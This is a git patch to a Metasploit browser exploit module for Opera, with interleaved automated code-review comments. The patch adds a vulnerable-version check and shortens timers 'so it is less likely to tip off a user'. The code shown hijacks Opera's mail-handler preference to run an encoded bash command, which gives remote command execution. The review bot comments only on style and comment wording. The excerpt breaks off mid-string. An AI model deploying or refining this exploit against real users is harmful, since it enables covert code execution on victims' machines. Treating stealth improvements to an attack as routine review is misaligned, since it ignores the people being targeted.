From c29af0197a42bbe867ae4a7292cbac6fa9c14dd0 Mon Sep 17 00:00:00 2001
From: James Lee
Date: Tue, 28 Jul 2009 11:08:50 +0000
Subject: [PATCH] make opera_historysearch work in an iframe and speed it up so it is less likely to tip off a user
git-svn-id: file:///home/svn/framework3/trunk@6915 4d416f70-5f16-0410-b530-b9f4589650da
---
 .../multi/browser/opera_historysearch.rb | 22 ++++++++++++-------
 1 file changed, 14 insertions(+), 8 deletions(-)
diff --git a/modules/exploits/multi/browser/opera_historysearch.rb b/modules/exploits/multi/browser/opera_historysearch.rb
index efb2ff07b9..500f4479a7 100644
--- a/modules/exploits/multi/browser/opera_historysearch.rb
+++ b/modules/exploits/multi/browser/opera_historysearch.rb
@@ -22,7 +22,12 @@ class Metasploit3 < Msf::Exploit::Remote
 :ua_name => HttpClients::OPERA,
 :javascript => true,
 :rank => ExcellentRanking, # reliable command execution
- :vuln_test => nil,
+ :vuln_test => %Q{
+ v = parseFloat(opera.version());
+ if (9.5 < v && 9.62 > v) {
+ is_vuln = true;
+ }
+ },
 })

 def initialize(info = {})
@@ -115,7 +120,6 @@ class Metasploit3 < Msf::Exploit::Remote
 s.src="opera:config";
 s.id="config_window";
 document.body.appendChild(s);
- setTimeout(function () {location.href='about:blank'},1000);
 config_window.eval(
 "var cmd = unescape('/bin/bash -c %22#{penc}%22 ');" +
 "old_app = opera.getPreference('Mail','External Application');" +
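Review bot: In the new `:vuln_test` JavaScript of the first hunk, `v` is assigned without `var`, so it becomes a global of whatever page the check runs in, and the reversed comparisons `9.5 < v && 9.62 > v` read awkwardly; `var v = parseFloat(opera.version());` and `if (v > 9.5 && v < 9.62) {` express the same test more plainly. Both bounds are exclusive, so a version that parses to exactly 9.5 or 9.62 is treated as not vulnerable, and nothing in the diff says whether that is intentional; a one-line comment naming the range the bounds are meant to cover (taken from the module's references, not guessed) would make the test reviewable. When `opera.version()` yields something `parseFloat` cannot read, `v` is `NaN`, both comparisons are false and `is_vuln` is left unset, which is the safe outcome and could be stated in the same comment. The enclosing `update_info` hash starts before this hunk.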
@@ -124,11 +128,11 @@ class Metasploit3 < Msf::Exploit::Remote
 "opera.setPreference('Mail','Handler','2');" +
 "app_link = document.createElement('a');" +
 "app_link.setAttribute('href', 'mailto:a@b.com');" +
- "setTimeout(function () {opera.setPreference('Mail','External Application',old_app)},500);" +
- "setTimeout(function () {opera.setPreference('Mail','Handler',old_handler)},500);" +
- "setTimeout(function () {location.href='about:blank'},500);" +
 "app_link.click();" +
+ "setTimeout(function () {opera.setPreference('Mail','External Application',old_app)},0);" +
+ "setTimeout(function () {opera.setPreference('Mail','Handler',old_handler)},0);" +
 "");
+ setTimeout(function () {window.location='about:blank'},1);
 }

 when /[?]history/
@@ -148,10 +152,12 @@ class Metasploit3 < Msf::Exploit::Remote
 print_status("Sending #{self.name} to #{cli.peerhost} for request #{request.uri}")
 js = %Q^
- window.onload = function() {
- url = location.href;
- location.href = url + "?history#
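Review bot: The delays in this hunk drop from 500/1000 ms to the bare numbers `0` and `1` with no comment, so a later reader cannot tell that the order (the two `setPreference` restore timers queued inside `config_window` before the outer `setTimeout(function () {window.location='about:blank'},1);` runs) is deliberate rather than arbitrary. A short comment above the outer timer such as `# 0 ms restores are queued in the config frame before this window navigates away` would record the assumption; whether the restore timers are still honoured once this window has navigated is not something the diff shows, so the comment should mark it as an assumption. The old navigation was inside the eval'd string and targeted the config frame, while the new `window.location` assignment targets the module's own window; that change in target deserves a word too. The enclosing method starts before this hunk.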